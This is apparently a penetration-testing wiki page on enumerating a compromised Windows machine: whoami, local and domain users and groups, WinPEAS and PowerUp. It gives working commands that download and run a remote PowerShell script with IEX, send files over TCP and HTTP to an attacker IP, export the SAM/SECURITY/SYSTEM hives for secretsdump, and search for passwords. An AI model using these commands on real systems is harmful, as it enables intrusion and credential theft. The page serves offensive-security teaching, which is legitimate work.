| description |
|---|
Get information about a compromised machine from the to find possible ways to escalate privileges |
For enumeration of network protocols like SMB, RPC, or LDAP, see #enumeration.
Users are important to understand on a computer or domain because they might have different or higher permissions than your current user. By understanding exactly how the users relate to each other and how privileges can be abused, you can quickly escalate privileges to reach the crown jewels.
For domain users/groups, #bloodhound can enumerate and analyze all the connections between them for a better understanding, and possible privilege escalation methods.
The whoami command can tell you what user you are running as, as well as some more detailed information about privileges and groups, using the /all flag:
whoami /allFirst comes simply the username, and their SID. The part before the \ tells you where the user comes from. If this is the same as the output for the hostname command, it is a local user on that computer.
USER INFORMATION
----------------
User Name SID
================ ==============================================
WORKSTATION\user S-1-5-21-5386719015-7638691639-2457330780-1001
Next is the group information containing all the groups you are in. Some default ones you will always find here, but others have interesting properties. Like BUILTIN\Remote Desktop Users which allows logging in via RDP (port 3389), or custom groups that have a long SID.
You will also always find the Mandatory Label\..., called "Integrity level". It is used as a base for what actions you can and can't do. It may have one of the following values:
- System: SYSTEM (kernel, ...)
- High: Elevated users (Administrators, with "Run as Administrator")
- Medium: Standard users (default, most often seen)
- Low: Restricted rights often used in sandboxed processes or for directories storing temporary data
- Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKSTATION\group Alias S-1-5-21-5386719015-7638691639-2457330780-1008 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Lastly, there are the #privileges, which all have their own special thing that you are allowed to do with this privilege. Some privileges like SeImpersonatePrivilege can be abused.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
While looking at our own user is interesting, we should be looking at how we attack other users, and exactly who to attack. To get all local users on a computer, use Get-LocalUser in PowerShell:
PS C:\> Get-LocalUser
Name Enabled Description
---- ------- -----------
Administrator False Built-in account for administering the computer/domain
user True
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
Users may be part of multiple Groups. There are many default groups windows uses, but custom ones can be made too. We can list them using Get-LocalGroup in PowerShell:
PS C:\> Get-LocalGroup
Name Description
---- -----------
group
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators Administrators have complete and unrestricted access to the computer/domain
Backup Operators Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators Members are authorized to perform cryptographic operations.
Device Owners Members of this group can change system-wide settings.
Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers Members of this group can read event logs from local machine
Guests Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS Built-in group used by Internet Information Services.
Network Configuration Operators Members in this group can have some administrative privileges to manage configur...
Performance Log Users Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users Members of this group can access performance counter data locally and remotely
Power Users Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users Members in this group are granted the right to logon remotely
Remote Management Users Members of this group can access WMI resources over management protocols (such a...
Replicator Supports file replication in a domain
System Managed Accounts Group Members of this group are managed by the system.
Users Users are prevented from making accidental or intentional system-wide changes an...
Lastly, to learn who are the members of a group, we can use Get-LocalGroupMember:
PS C:\> Get-LocalGroupMember group
ObjectClass Name PrincipalSource
----------- ---- ---------------
User WORKSTATION\user Local
{% hint style="info" %}
Tip: Requesting this for theAdministrators group tells you who to target!
{% endhint %}
Local users/groups only work on one computer, but domain users/groups work on all domain-joined computers. To list all domain users, use the net user command with the /domain flag:
PS C:\> net user /domain
User accounts for \\DC1.corp.com
-------------------------------------------------------------------------------
Administrator user1 Guest
user2 admin1 admin2
krbtgt
There you find some default users like Administrator, Guest, and krbtgt, but also all other users on the domain. To get more detailed information about one user, include their name in the command:
PS C:\> net user "admin1" /domain
User name admin1
Full Name
Comment
User's comment
...
Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
These users can also be part of groups, which you can list. There are several default groups all with their own special group policies saying what they can and can't do. List them with net group:
PS C:\> net group /domain
Group Accounts for \\DC1.corp.com
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Debug
*Development
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
If we want to learn more about a custom group, or just see who is a member of the group, we can also include that group name in the command:
PS C:\> net group "Development" /domain
Group name Development
Comment
Members
-------------------------------------------------------------------------------
user2
This section contains a set of useful commands for CMD or PowerShell that you'll often look for while enumerating a compromised machine.
Before doing manual enumeration, getting an idea of the system through automated means might be quicker. The WinPEAS script is a Windows equivalent to the well-known LinPEAS script for Linux. It enumerates many common misconfigurations in the system and tries to find vulnerabilities. This generates a lot of output to sift through, but it is a very useful output that normally would require a ton of manual work.
To run it, download the latest winPEASany.exe from the Releases page and download it from a local HTTP server if your target cannot access the public internet:
{% code title="Run WinPEAS" overflow="wrap" %}
cd /Windows/Tasks # world-writable directory
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -o winPEASany.exe
.\winPEASany.exe | Tee-Object winPEAS.txt # write output to a file (may take long){% endcode %}
Another such tool is PowerUp.ps1 which looks for more directly exploitable vulnerabilities and has commands to automatically exploit them too:
{% code title="Run PowerUp.ps1" overflow="wrap" %}
wget https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1 -o PowerUp.ps1
# It is a Module, and to import it we need to disable the execution policy
powershell -ep bypass
. .\PowerUp.ps1
# Now that it is imported into the current shell, we can run its commands
Invoke-PrivescAudit{% endcode %}
Test-NetConnection -Port 22 10.10.10.10
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
↳ The above loop is very slow because it goes through ports one by one with a timeout
net view \\dc01 /all
dism /online /Enable-Feature /FeatureName:TelnetClient
telnet 10.10.10.10 25 # SMTP
↳ This feature needs to be already enabled, or enabled by you as an administrator
{% code title="wget $URL -O $FILE" %}
iwr http://10.10.10.10/file.txt -o file.txt{% endcode %}
{% code title="curl $IP | sh" %}
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/script.ps1');{% endcode %}
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect("10.10.10.10", 8000)
$writer = New-Object System.IO.StreamWriter($client.GetStream())
$bytes = (Get-Content -Encoding byte "C:\Windows\win.ini")
$writer.BaseStream.Write($bytes, 0, $bytes.Length)
$writer.Flush()
↳ For larger file transfers, you can also do this over HTTP with python3 -m uploadserver:
curl.exe -X POST http://10.10.10.10:8000/upload -F 'files=@C:\Windows\win.ini'Get-ChildItem -File -Recurse -ErrorAction SilentlyContinue
# Or to get a nice tree view:
tree /F
dir -Recurse | Select-String -Pattern "password"
icacls C:\Path\To\DirOrFile
# Output reference: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls#remarks
{% code title="List disks (C:, D:, etc.)" %}
wmic logicaldisk get deviceid,volumename,description{% endcode %}
One interesting location to check is C:\Windows\System32\config\, where normally only administrators should be able to read contents. Permissions may be misconfigured or you may find the same files backed up in another readable place, but these should be interesting:
SAM- stores local cached credentials, known as SAM secretsSECURITY- stores domain cached credentials, known as LSA secretsSYSTEM- contains information to decrypt both SAM and LSA secrets above
On a running system, you often cannot copy these files directly because they are in use. With backups, this is not the case, but on a running system you can use reg to export them live:
{% code title="Export from live system" %}
reg save HKLM\SAM "C:\Windows\Temp\SAM"
reg save HKLM\SECURITY "C:\Windows\Temp\SECURITY"
reg save HKLM\SYSTEM "C:\Windows\Temp\SYSTEM"{% endcode %}
When these three files, either copied directly or exported, are copied to your local machine, it is time to extract credentials from them. Using secretsdump.py it is possible to parse the three files like so:
{% code title="Extract credentials" overflow="wrap" %}
secretsdump.py -sam 'SAM' -security 'SECURITY' -system 'SYSTEM' LOCAL{% endcode %}
Get-History
# Raw method below can bypass Clear-History
type (Get-PSReadlineOption).HistorySavePath
# Get verbose script block events (may be large)
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath "*[System[EventID=4104]]" | Export-Csv -Path 'ScriptBlockEvents.csv' -NoTypeInformation
Import-Module .\PowerView.ps1
$sid = (get-domainuser j0r1an).objectsid
Get-ObjectACL | ? {$_.SecurityIdentifier -eq $sid} | select ObjectDN,ActiveDirectoryRights
# List all services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Start/stop a service if you are allowed
net stop $SERVICE_NAME
net start $SERVICE_NAME
{% embed url="https://lolbas-project.github.io/" %} A list of builtin Windows binaries and commands that can download, execute and do other interesting things {% endembed %}